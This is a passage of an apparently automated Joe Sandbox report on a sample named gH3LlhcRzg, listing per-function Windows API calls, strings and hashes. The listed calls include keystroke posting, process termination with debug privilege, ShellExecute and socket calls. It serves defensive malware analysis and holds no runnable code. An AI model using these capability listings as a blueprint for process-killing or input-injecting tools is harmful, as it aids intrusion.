                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D296D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D296E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D296F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D296FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 950f1ffc56c1f90be087878cf6b0f43e42193b1dd967ccc10ae6139216b3ecde
                                                            • Instruction ID: afd6bb8a9059cf90f93e1636b9325d02293273b5f403bdbdd76e50c8e19ea280
                                                            • Opcode Fuzzy Hash: 950f1ffc56c1f90be087878cf6b0f43e42193b1dd967ccc10ae6139216b3ecde
                                                            • Instruction Fuzzy Hash: A711CEB1910718BFF6106B64AC89F6A7A6DEB5C756F100425F684AB1A0C9F25C109AB4
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D2853C,00000B00,?,?), ref: 00D2892A
                                                            • HeapAlloc.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D28931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D2853C,00000B00,?,?), ref: 00D28946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00D2853C,00000B00,?,?), ref: 00D2894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D28951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D2853C,00000B00,?,?), ref: 00D28961
                                                            • GetCurrentProcess.KERNEL32(00D2853C,00000000,?,00D2853C,00000B00,?,?), ref: 00D28969
                                                            • DuplicateHandle.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D2896C
                                                            • CreateThread.KERNEL32(00000000,00000000,00D28992,00000000,00000000,00000000), ref: 00D28986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 67cc120143f7c0cb50d39fe677262576a4f4ed3e1e28fffdde2c2fe443bc62ec
                                                            • Instruction ID: 08b4546e23cc8f07df91c328ab713c83078319b35c5c7661089e5fd05ebcd094
                                                            • Opcode Fuzzy Hash: 67cc120143f7c0cb50d39fe677262576a4f4ed3e1e28fffdde2c2fe443bc62ec
                                                            • Instruction Fuzzy Hash: 4901A8B5240708FFE710ABA5DC49F6B3BACEB89711F408421FA15DB2A1CA7098008A31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 11e717deef3d7dc59c5358ed0448c1db917a4eab86fe26861a94aa6682564f32
                                                            • Instruction ID: 0a9340a10ee727b0a353ee153336ba6e8174e2fb5bb84b47c3eeb0ccfa8d3882
                                                            • Opcode Fuzzy Hash: 11e717deef3d7dc59c5358ed0448c1db917a4eab86fe26861a94aa6682564f32
                                                            • Instruction Fuzzy Hash: CDC17E71A0021A9BDF10DFA9D894AAFB7F5FB48314F148469F945AB280E770ED45CBB0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: 717f36cb8ee2cc8847b42748b2f4b4e06b758ef130fa4049bcaffb49b23a5790
                                                            • Instruction ID: 1acc56e0c22e89a1b51f9e8432b219a3ec7fca34eb4e74c8c754cc247488f394
                                                            • Opcode Fuzzy Hash: 717f36cb8ee2cc8847b42748b2f4b4e06b758ef130fa4049bcaffb49b23a5790
                                                            • Instruction Fuzzy Hash: 9D918E71A00219ABDF24DFA6C898FAFB7B8EF45710F148159F915AB280D7709945CFB0
                                                            APIs
                                                              • Part of subcall function 00D2710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?,?,00D27455), ref: 00D27127
                                                              • Part of subcall function 00D2710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27142
                                                              • Part of subcall function 00D2710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27150
                                                              • Part of subcall function 00D2710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?), ref: 00D27160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00D49806
                                                            • _memset.LIBCMT ref: 00D49813
                                                            • _memset.LIBCMT ref: 00D49956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00D49982
                                                            • CoTaskMemFree.OLE32(?), ref: 00D4998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00D499DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: b2985923ab79fb8f884d118afb70d1c7d4721cb079ce3786e2712d18727edfd7
                                                            • Instruction ID: a7cb03e26d16173a319c893194df2afde5c67fb1136a080d7a16743bbc94e261
                                                            • Opcode Fuzzy Hash: b2985923ab79fb8f884d118afb70d1c7d4721cb079ce3786e2712d18727edfd7
                                                            • Instruction Fuzzy Hash: 6C914771D00229EBDB10DFA5DC95EDEBBB9EF08310F20415AF519A7281EB319A44CFA0
                                                            APIs
                                                              • Part of subcall function 00D33C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00D33C7A
                                                              • Part of subcall function 00D33C55: Process32FirstW.KERNEL32(00000000,?), ref: 00D33C88
                                                              • Part of subcall function 00D33C55: CloseHandle.KERNEL32(00000000), ref: 00D33D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4E9A4
                                                            • GetLastError.KERNEL32 ref: 00D4E9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4E9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D4EA63
                                                            • GetLastError.KERNEL32(00000000), ref: 00D4EA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D4EAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: b63d5dfcf5e8f774a71c2647a84b709fc7a0c01ff4f87700a528fa3dadc85000
                                                            • Instruction ID: fd2947afcaf9cef874fe8144b1236a8178cfb4967f89a9d4718dbdd62b257d22
                                                            • Opcode Fuzzy Hash: b63d5dfcf5e8f774a71c2647a84b709fc7a0c01ff4f87700a528fa3dadc85000
                                                            • Instruction Fuzzy Hash: 63415671200301AFEB15EF24DC96F6EBBA5BF40714F188459FA429B3D2CB75A904DBA1
                                                            APIs
                                                            • ShowWindow.USER32(00D957B0,00000000,01406658,?,?,00D957B0,?,00D5B5A8,?,?), ref: 00D5B712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00D5B736
                                                            • ShowWindow.USER32(00D957B0,00000000,01406658,?,?,00D957B0,?,00D5B5A8,?,?), ref: 00D5B796
                                                            • ShowWindow.USER32(00000000,00000004,?,00D5B5A8,?,?), ref: 00D5B7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 00D5B7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00D5B7EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 642888154-2594219639
                                                            • Opcode ID: c7cb9a9b5aa562246130d0e20bf12a09797c6676ef0682f9a443ec3f27fdfd34
                                                            • Instruction ID: 29d63f791e5617887f013583098c8947b3b8bf63fbf1c3dae193740d2b6f9f18
                                                            • Opcode Fuzzy Hash: c7cb9a9b5aa562246130d0e20bf12a09797c6676ef0682f9a443ec3f27fdfd34
                                                            • Instruction Fuzzy Hash: 2A414534500344AFDF25CF24C499B957BE1FB49362F2C41B6ED588F662C731A85ACB61
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00D33033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: c10f0d5d60521510f2f625de1bead42662e42adbef8ac06bebe07f19b7b7edb0
                                                            • Instruction ID: 3a31f23432f6d7860b0b9204bb4315434a9d01404d6ab6739fda743512d0782c
                                                            • Opcode Fuzzy Hash: c10f0d5d60521510f2f625de1bead42662e42adbef8ac06bebe07f19b7b7edb0
                                                            • Instruction Fuzzy Hash: 6A11D53164C34ABEE728AF54DC82C7B679C9F15361F24006AFA00A6281DB619F4466B5
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D34312
                                                            • LoadStringW.USER32(00000000), ref: 00D34319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D3432F
                                                            • LoadStringW.USER32(00000000), ref: 00D34336
                                                            • _wprintf.LIBCMT ref: 00D3435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D3437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00D34357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: ec93a1fc77cb9ad7e57bde9da19da528a976346529926c4b8fc1dd06bd09c8a5
                                                            • Instruction ID: c39def885860542054a857efb70e68639d222c9e28008bac411a85384c929bd2
                                                            • Opcode Fuzzy Hash: ec93a1fc77cb9ad7e57bde9da19da528a976346529926c4b8fc1dd06bd09c8a5
                                                            • Instruction Fuzzy Hash: 8A01A2F2800308BFE750A7A0DD89EFB776CDB08302F0001A1BB45E6111EA349E844B70
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00CD2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00CD2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00D0C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00D0C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 37840f2394e395a910d5a7de83c056c4065d51d9b5fb7528c30077ccd9cb4850
                                                            • Instruction ID: 9e0a5a83d6bff7fea21cab35410b11074faa93042d95a88309b125222bdca07e
                                                            • Opcode Fuzzy Hash: 37840f2394e395a910d5a7de83c056c4065d51d9b5fb7528c30077ccd9cb4850
                                                            • Instruction Fuzzy Hash: E3411630718780ABCB359B399C88B6B7B92EB65310F58891FE65F867A0C670D941F730
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D370DD
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D37114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00D37130
                                                            • _memmove.LIBCMT ref: 00D3717E
                                                            • _memmove.LIBCMT ref: 00D3719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00D371AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D371BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D371DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: ad954cf5ea888e125d33662a72784fc89c8502edd53cc76853356681feb4536c
                                                            • Instruction ID: 503a4cec4aced73ceee503b15c52d21c49a1080c785ffdaa48b889f8ac85e8c6
                                                            • Opcode Fuzzy Hash: ad954cf5ea888e125d33662a72784fc89c8502edd53cc76853356681feb4536c
                                                            • Instruction Fuzzy Hash: E8316E76900309EBCF50DFA4DC85AAABB78EF45710F2441A5EE04EB246DB309A10DBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: dc16ce3f1a544e748584c10179d16ef81e00da9acb0376e7b88b915ea0e174ab
                                                            • Instruction ID: 70611c1928aeaa56915eb6713eb236764c99e73c48e1df108b2022e789621056
                                                            • Opcode Fuzzy Hash: dc16ce3f1a544e748584c10179d16ef81e00da9acb0376e7b88b915ea0e174ab
                                                            • Instruction Fuzzy Hash: E321FC7160162A7FE2046621BD42FFB7B5C9E7037CF0C4022FE0456587EBA5DE15A5B2
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • _wcstok.LIBCMT ref: 00D3EC94
                                                            • _wcscpy.LIBCMT ref: 00D3ED23
                                                            • _memset.LIBCMT ref: 00D3ED56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: e80c0655e78fa496a4a2f55580f30d1a2bb7db4726f399a618802d36d922ab2e
                                                            • Instruction ID: cb72adaafad5435534996bf703dbb460099924b83329b32cc386543a06d379b8
                                                            • Opcode Fuzzy Hash: e80c0655e78fa496a4a2f55580f30d1a2bb7db4726f399a618802d36d922ab2e
                                                            • Instruction Fuzzy Hash: 2CC16C755083009FC764EF24D885A6AB7E0EF85310F14492EF9999B3E2DB70EC45DB92
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00D46C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D46C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46C34
                                                            • htons.WSOCK32(?), ref: 00D46CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 00D46CA7
                                                              • Part of subcall function 00D2A7E9: _strlen.LIBCMT ref: 00D2A7F3
                                                              • Part of subcall function 00D2A7E9: _memmove.LIBCMT ref: 00D2A815
                                                            • _strlen.LIBCMT ref: 00D46D44
                                                            • _memmove.LIBCMT ref: 00D46DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 7a13398f3b48dafd4a391da59af024324c37c194d8324b0b31c2c6baca5b8be7
                                                            • Instruction ID: b77516561fa0c64a8240acf00c927eb5333c2ab1f59e75e017fd048a1f3cd7e4
                                                            • Opcode Fuzzy Hash: 7a13398f3b48dafd4a391da59af024324c37c194d8324b0b31c2c6baca5b8be7
                                                            • Instruction Fuzzy Hash: DF81DF71604300ABC710EF24CC82E6AB7A9EF85714F14491EFA569B3D2DB70ED05CBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cca04158602cf95c8ba30dbc89f565f5c64a93862af96ea4f1902875554d2ada
                                                            • Instruction ID: 8a58b88f5a2db988fad94362ce0cf416faa534a0804bdbc3b7ef19b192eae1ec
                                                            • Opcode Fuzzy Hash: cca04158602cf95c8ba30dbc89f565f5c64a93862af96ea4f1902875554d2ada
                                                            • Instruction Fuzzy Hash: 4B715E30900209FFCB149F99CC85ABE7BB5FF85325F18815AFA15AB351D7349A51CB60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4F448
                                                            • _memset.LIBCMT ref: 00D4F511
                                                            • ShellExecuteExW.SHELL32(?), ref: 00D4F556
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 00D4F5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D4F5FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
